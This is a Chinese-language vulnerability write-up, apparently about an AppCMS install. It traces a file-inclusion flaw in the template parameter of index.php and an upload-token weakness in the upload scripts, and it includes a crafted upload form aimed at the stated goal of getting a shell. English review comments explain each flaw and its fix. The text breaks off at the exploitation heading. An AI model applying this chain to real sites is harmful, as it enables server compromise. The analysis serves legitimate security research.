0x01 代碼分析
看到 index.php 文件
// Excerpt from the CMS's index.php (the subject of the write-up): choose a
// template name, build a file path from it and require() it. $cid, $p, $id,
// $hid and the CMS object $c are assigned earlier in the file, outside this
// excerpt.
//
// NOTE(review): $tpl is taken straight from the query string and reaches the
// require() at the bottom joined into a path. Nothing in between restricts it
// to a known template name or rejects directory separators and '..';
// file_exists() only confirms that something is there. The fix belongs right
// here: check the request-supplied name against an allow-list of templates
// (or at least a character allow-list of letters, digits and '_'), and after
// composing $tmp_file confirm that its realpath() stays under the templates
// directory before including it.
$tpl = isset($_GET['tpl'])?$_GET['tpl']:'index';
// 2.1) Template bound to the category.
if (intval($cid) > 0) {
    $ncate = isset($c -> categories[$cid])?$c -> categories[$cid]:'';
    if ($ncate == '') die('分類不存在');
    if ($ncate['tpl_listvar'] != '') {
        // A list template is configured: use its file name without extension.
        $tpl = substr($ncate['tpl_listvar'], 0, stripos($ncate['tpl_listvar'], "."));
    }
    if ($ncate['tpl_index'] != '') {
        // A cover template is configured: it replaces the list template on page 1.
        if ($p == 1) $tpl = substr($ncate['tpl_index'], 0, stripos($ncate['tpl_index'], "."));
    }
}
// 2.2) Content-page templates under the category: info detail page, app
// detail page, app version-history page.
if ($tpl == 'content_app') {
    $c -> update_vistor($id, 0);
    $con = $c -> get_content($id, 0);
    if(!isset($con['app_id'])) { die('信息不存在'); }
} elseif ($tpl == 'content_app_history') {
    $c -> update_vistor($id, 0);
    $con = $c -> get_content($id, 0);
    // exit(print_r($con['history']));
    foreach($con['history'] as $a) {
        // Pick the history entry for the requested version ($hid).
        if ($a['history_id'] == $hid) {   // loose ==; $hid presumably comes from the request
            $history = $a;
            // print_r($history);
            // `continue` at the end of the loop body is a no-op: if several
            // entries share the same history_id the last one wins. A `break`
            // was presumably intended.
            continue;
        }
    }
    if (!isset($history)) die('歷史版本數據不存在');
} elseif ($tpl == 'content_info') {
    $c -> update_vistor($id, 1);
    $con = $c -> get_content($id, 1);
    if(!isset($con['info_id'])) { die('信息不存在'); }
}
// A content page may override the template with its category's tpl_content.
if (isset($con) && $c -> categories[$con['last_cate_id']]['tpl_content'] != '') $tpl = $c -> categories[$con['last_cate_id']]['tpl_content'];
// Top-level category id of a content page, used by the navigation bar.
if (isset($con)) {
    $top = $c -> cate_father($con['last_cate_id']);
    $topid = $top[0]['cate_id'];
}
// 3) Compose the template page path. $from_mobile is the template directory name.
$from_mobile = TEMPLATE;
if (defined('CONTENT_MOBILE') && CONTENT_MOBILE == 1) {
    // Adaptive WAP browsing.
    if ($c -> from_mobile()) {
        // Bare `m` is an undefined constant: PHP < 8 falls back to the string
        // 'm' with a warning, PHP 8 throws an Error. 'm' was presumably meant.
        $from_mobile = defined('WAP_TPL') && WAP_TPL ? WAP_TPL : m;
    }
}
// The next two branches key off the Host header, which the client sends; they
// only choose between configured directory names, so $from_mobile itself is
// never request-supplied text.
if (defined('WAP_URL') && WAP_URL != '' && 'http://' . $_SERVER['HTTP_HOST'] == WAP_URL) {
    // WAP on its own domain.
    $from_mobile = WAP_TPL;
}
if (substr($_SERVER['HTTP_HOST'], 0, 4) == 'mkt.') {
    // Mobile client.
    $from_mobile = "mkt";
}
// $tpl is used verbatim; '.php' is appended only when it is not already there.
if (substr($tpl, strlen($tpl)-4, 4) == '.php') {
    $tmp_file = '/templates/' . $from_mobile . '/' . $tpl;
} else {
    $tmp_file = '/templates/' . $from_mobile . '/' . $tpl . '.php';
}
// The include sink. file_exists() is an existence check, not a path or
// authorization check, and the die() message echoes the attempted path
// (including the request-supplied part) back unescaped.
if (!file_exists(dirname(__FILE__) . $tmp_file)) die('模板頁面不存在' . $tmp_file);
require(dirname(__FILE__) . $tmp_file);
/**
 * Remaining action functions begin here.
 */
能夠看到傳進來的 tpl 沒有做任何過濾,直接包含了。
可是這個 cms 沒有直接上傳的地方,前臺沒啥功能。可是,如何利用這個包含呢?難道只有包含日誌神馬的嗎?那太雞肋了。咱們應該想辦法來 getshell。
看到 /upload/upload_file.php
// Excerpt from upload/upload_file.php: verify the upload token `v`, then
// decide where the file will be saved. The rest of the upload configuration
// and the save itself follow outside this excerpt.
$page['get'] = $_GET;
$page['post'] = $_POST;
$dbm = new db_mysql();   // not used within this excerpt
// `params` is forwarded from upload_form.php; the preg_replace undoes
// backslash-escaped quotes so json_decode() can parse it. $json_params is
// not read anywhere in this excerpt.
$params = $page['get']['params'];
/**
 * $params=json_encode(urldecode($params));
 * die('<script> alert('.$params.');</script>');
 */
$params = preg_replace('~(\\\")~', '"', $params);
$json_params = json_decode($params);
// 1. Request verification.
// The token is helper::encrypt(UPLOAD_CODE . <unix timestamp>, UPLOAD_KEY),
// as produced by upload_form.php. The checks below only establish that the
// decrypted value starts with UPLOAD_CODE and that ten consecutive digits
// appear somewhere after it; the timestamp is never compared with the current
// time, so a token, once obtained, stays valid indefinitely. A fix would parse
// the digits and reject tokens outside a short window, and bind the token to
// the authenticated session rather than to a value printed into a page.
$verify = isset($page['get']['v'])?$page['get']['v']:'';
if ($verify == '') die('<script>alert("No Access 001");</script>');
$verify = helper :: decrypt($verify, UPLOAD_KEY);
$gsc = substr($verify, 0, strlen(UPLOAD_CODE));
// Loose != on a secret-derived prefix; !== (or hash_equals()) is the safer
// form. NOTE(review): this message and the next one reflect the decrypted
// value of request-supplied data into the response without escaping; a fixed
// message would avoid both the markup injection and the information leak.
if ($gsc != UPLOAD_CODE) die('<script>alert("No Access 002 ' . $gsc . '");</script>');
if (!preg_match('~(\d{10})~', substr($verify, strlen(UPLOAD_CODE)))) die('<script>alert("No Access 003' . $verify . '");</script>');
// 2. Receive the uploaded image.
// Save directory: <UPLOAD_PATH>/Y/m/d/, relative to the script's working
// directory ('.' prefix); .apk files go under UPLOAD_PATH_APK instead.
$save_path = '.' . UPLOAD_PATH . date('Y/m/d') . '/';
$file_name=strtolower($_FILES['file']['name']);
// strstr() is a substring test, not a suffix test; str_ends_with() or
// pathinfo() express "the extension is .apk" correctly.
if(strstr($file_name,'.apk')) {
    $save_path = '.' . (defined('UPLOAD_PATH_APK')?UPLOAD_PATH_APK:'/apk/') . date('Y/m/d') . '/';
}
$upload_config = array();
$upload_config['savePath'] = $save_path; // image save path
通過 $verify 來驗證是否能夠上傳,如何得到 $verify 呢?看到 upload_form.php
<?php
// Excerpt from upload_form.php: renders the form that posts to
// upload/upload_file.php.
//
// NOTE(review): the upload token is generated here and printed into the form's
// action URL, so whoever can load this page receives a token that
// upload_file.php accepts (that script checks only the UPLOAD_CODE prefix and
// that a timestamp is present, not its age). Whether this page sits behind any
// authentication is not visible in the excerpt. The fix is to stop exposing a
// long-lived secret in page content: issue a short-lived, session-bound token
// and re-check the session server-side in upload_file.php.
require_once(dirname(__FILE__)."/../core/init.php");
$upload_server= SITE_PATH."upload/";
// Upload verification string: encrypt(UPLOAD_CODE . current unix time, UPLOAD_KEY).
// strtotime(date('Y-m-d H:i:s')) is effectively time() at one-second resolution.
$verify=helper::encrypt(UPLOAD_CODE.strtotime(date('Y-m-d H:i:s')),UPLOAD_KEY);
// `params` comes from the query string and is forwarded to upload_file.php
// (urlencoded in the action URL below); $json is not used in this excerpt.
$params=$_GET['params'];
$params=preg_replace('~(\\\")~','"',$params);
$json=json_decode($params);
?>
........
<body>
<!-- $upload_server and $verify are echoed raw into the action URL; only $params is urlencoded. -->
<form action='<?php echo($upload_server); ?>upload_file.php?params=<?php echo urlencode($params);?>&v=<?php echo($verify);?>' id="form" name="form" enctype="multipart/form-data" method="post" target="hidden_frame">
<a class="input-file">上傳文件<input type="file" id="file" name="file" size="1" style="width:70px;cursor:default;height:25px;line-height:25px;"></a>
<iframe name="hidden_frame" id="hidden_frame" frameborder="no" border="0″ marginwidth="0″ marginheight="0" scrolling="no" allowtransparency="yes"></iframe>
</form>
</body>
</html>
直接 echo 出了它的值,這樣就好辦了。咱們在本地構造上傳表單。
<!-- This is the write-up's reproduction form, not CMS code. The value of `v`
     is the token that upload_form.php printed into its own form action. The
     defensive fix belongs in the CMS, not here: do not expose the token in
     page content, give it a short lifetime, bind it to a session and re-check
     that session in upload_file.php. -->
</html><head> </head>
<body>
<form action="http://127.0.0.1/appcms/upload/upload_file.php?params=&v=tHtAtQScLEskxnAynNEomxsWH" id="form" name="form" enctype="multipart/form-data" method="post" target="hidden_frame">
<input type='file' name='file' />
<input type='submit' value='Upload File' />
<form>
</body>
</html>
然後就能夠上傳了,因爲有一個回調函數,因此抓包能夠看到路徑。
0x02 利用過程